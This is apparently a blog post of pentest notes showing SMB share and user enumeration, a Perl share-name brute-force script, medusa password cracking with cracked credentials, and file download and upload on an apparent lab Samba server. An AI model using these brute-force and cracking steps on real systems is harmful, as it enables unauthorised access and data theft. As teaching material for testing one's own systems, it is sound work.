Finding open smb shares with NMAP
NMAP allows us to probe for possible open smb shares using its scripting engine.
root@asus:~/unix% nmap -T4 -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 48.21.33.124 Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-24 10:17 MDT Nmap scan report for srv01.acme.com (48.21.33.124) Host is up (0.00013s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-enum-shares: | account_used: username | IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (asus server (Samba, Ubuntu)) | Users: 2 | Max Users:| Path: C:\tmp | Anonymous access: READ/WRITE | Current user access: READ/WRITE | print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 0 | Max Users: | Path: C:\var\lib\samba\printers | Anonymous access: |_ Current user access: Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds root@asus:~/unix%
NMAP reports two shares open using the username 'username'. next we will do it manually and see what results we get from the smbclient.
Listing remote shares
root@asus:~/pentest_notes% smbclient -L //srv01.acme.com -N Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu] Sharename Type Comment --------- ---- ------- homes Disk Home Directories IPC$ IPC IPC Service (asus server (Samba, Ubuntu)) print$ Disk Printer Drivers Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu] Server Comment --------- ------- ASUS asus server (Samba, Ubuntu) Workgroup Master --------- ------- WORKGROUP ASUS root@asus:~/pentest_notes%
If we try to connect to the 'homes' share we get this result.
root@asus:~/pentest_notes% smbclient //srv01.acme.com/homes -N Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu] tree connect failed: NT_STATUS_BAD_NETWORK_NAME root@asus:~/pentest_notes%
We get an error saying `BAD NETWORK NAME`, but in the comment section it says `home directories` which we will assume means users home directories. Our next step will be to try and figure out what the usernames are for the share names.
Enumerating Samba users with NMAP
In order to enumerate the possible users on the system we can issue an nmap command running the script 'smb-enum-users' and see if we get lucky.
root@asus:~/unix% nmap -sU -sS --script=smb-enum-users -p U:137,T:139 48.21.33.124 Starting Nmap 7.01 ( https://nmap.org ) at 2019-09-24 10:07 MDT Nmap scan report for srv01.acme.com (48.21.33.124) Host is up (0.0027s latency). PORT STATE SERVICE 139/tcp open netbios-ssn 137/udp open netbios-ns Host script results: | smb-enum-users: | ASUS\clare (RID: 1001) | Full name: clare chapman | Description: | Flags: Normal user account | ASUS\hayden (RID: 1002) | Full name: hayden sutton | Description: | Flags: Normal user account | ASUS\jared (RID: 1003) | Full name: jared beck | Description: | Flags: Normal user account | ASUS\sam (RID: 1000) | Full name: sam | Description: | Flags: Normal user account | ASUS\sasha (RID: 1004) | Full name: sasha kim | Description: | Flags: Normal user account | ASUS\vance (RID: 1005) | Full name: vance perkins | Description: |_ Flags: Normal user account Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds root@asus:~/unix%
As you can see we found the users on the remote system. our next step is to verify the shares exist.
Enumerating possible shares via brute force
If we do not know any of the names of the shares in Home Directories, we need to use a Dictonary attack to uncover some common share names against the remote machine. For this we can write a small perl script using the smbclient tool to check if a shares exists. We will use a list of common first names as our payload.
#!/usr/bin/env perl
use strict;
use warnings;
##
## Dictonary attack against Samba server using smbclient
## try to unconver common user shares
##
my $host = "48.21.33.124";
my $filename = "common-names.txt";
open(my $fh, '<', $filename) or die $!;
while (my $word = <$fh>) {
chomp($word);
## Try to login with a username and no password
my $result = qx( smbclient //$host/$word -N 2>/dev/null );
## ACCESS_DENIED means the share exists
## BAD_NETW_NAME means the share does not exist
if ($result =~ /NT_STATUS_ACCESS_DENIED/g ) {
print "[+] Share Found @ //$host/$word\n";
next;
}
}
root@asus:~/pentest_notes% ./smbclient-share-brute.pl [+] Share Found @ //48.21.33.124/clare [+] Share Found @ //48.21.33.124/hayden [+] Share Found @ //48.21.33.124/jared [+] Share Found @ //48.21.33.124/sam [+] Share Found @ //48.21.33.124/sasha [+] Share Found @ //48.21.33.124/vance root@asus:~/pentest_notes%
As you can see we found some valid shares on the remote machine we can try to connect to. But first we need to check if these shares require a password or allow us to browse anonymously. We can issue the following command to check if authentication is needed for the share in question.
root@asus:~/pentest_notes% smbclient //srv01.acme.com/hayden -U hayden -N Enter hayden's password: tree connect failed: NT_STATUS_ACCESS_DENIED root@asus:~/pentest_notes%
The account does not allow anonymous browsing by using a blank password
Cracking share passwords
Once we found some valid share names we can try and crack the passwords associated with the accounts to gain access. For this we will use the tool 'medusa' and the rockyou wordlist as our payload.
root@asus:~% medusa -M smbnt -v 4 -b -h srv01.acme.com -U smb-users.txt -P rockyou.txt ACCOUNT FOUND: [smbnt] Host: srv01.acme.com User: hayden Password: manager [SUCCESS (ADMIN$ - Share Unavailable)] ACCOUNT FOUND: [smbnt] Host: srv01.acme.com User: jared Password: attlabs [SUCCESS (ADMIN$ - Share Unavailable)] ACCOUNT FOUND: [smbnt] Host: srv01.acme.com User: sasha Password: master [SUCCESS (ADMIN$ - Share Unavailable)] ACCOUNT FOUND: [smbnt] Host: srv01.acme.com User: vance Password: sonics [SUCCESS (ADMIN$ - Share Unavailable)] root@asus:~%
As you can see we found some valid logins we can test. Our next step is to login with the supplied creditendtials and try to browse the shares.
Browsing Shares
Now that we have valid login and passwords for some of the users on the remote machine we can now try and access the shares. SMB has a client which is similar to ftp and nfs which is easy to use.
root@asus:~/pentest_notes% smbclient //srv01.acme.com/hayden -U hayden Enter hayden's password: Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu] smb: \>
This is what a successful login looks like. Lets now type the 'help' command to see all the commands avaiable to us in this session.
smb: \> help ? allinfo altname archive backup blocksize cancel case_sensitive cd chmod chown close del dir du echo exit get getfacl geteas hardlink help history iosize lcd link lock lowercase ls l mask md mget mkdir more mput newer notify open posix posix_encrypt posix_open posix_mkdir posix_rmdir posix_unlink print prompt put pwd q queue quit readlink rd recurse reget rename reput rm rmdir showacls setea setmode scopy stat symlink tar tarmode timeout translate unlock volume vuid wdel logon listconnect showconnect tcon tdis tid logoff .. ! smb: \>
As you can see the interface is similar to that of the ftp client, so our next step is to see if we can list the directory contents of the share.
smb: \> ls . D 0 Wed May 15 07:45:17 2019 .. D 0 Sat Apr 27 16:58:49 2019 .Xdefaults H 1600 Sat Apr 27 16:58:15 2019 .kodi DH 0 Sat Apr 27 16:58:15 2019 .profile H 655 Sat Apr 27 16:58:15 2019 .bashrc H 3771 Sat Apr 27 16:58:15 2019 .xscreensaver H 7953 Sat Apr 27 16:58:15 2019 .bash_logout H 220 Sat Apr 27 16:58:15 2019 .local DH 0 Sat Apr 27 16:58:15 2019 ftp DR 0 Wed May 15 07:49:46 2019 mail D 0 Wed May 1 09:44:03 2019 .mozilla DH 0 Sat Apr 27 16:58:15 2019 .config DH 0 Sat Apr 27 16:58:15 2019 15013808 blocks of size 1024. 2057708 blocks available smb: \>
Lets try to get a file from the remote share.
smb: \> get .profile getting file \.profile of size 655 as .profile (23.7 KiloBytes/sec) (average 23.7 KiloBytes/sec) smb: \>
Lets try and see if we have write access to the remote share
smb: \> put server.pl putting file server.pl as \server.pl (25.2 kb/s) (average 25.2 kb/s) smb: \>
Changing directories is easy
smb: \> cd ftp smb: \ftp\> ls . DR 0 Wed May 15 07:49:46 2019 .. D 0 Mon Sep 2 14:54:37 2019 fo D 0 Wed May 15 07:49:41 2019 files D 0 Wed May 15 07:49:46 2019 15013808 blocks of size 1024. 2063700 blocks available smb: \ftp\>
No comments:
Post a Comment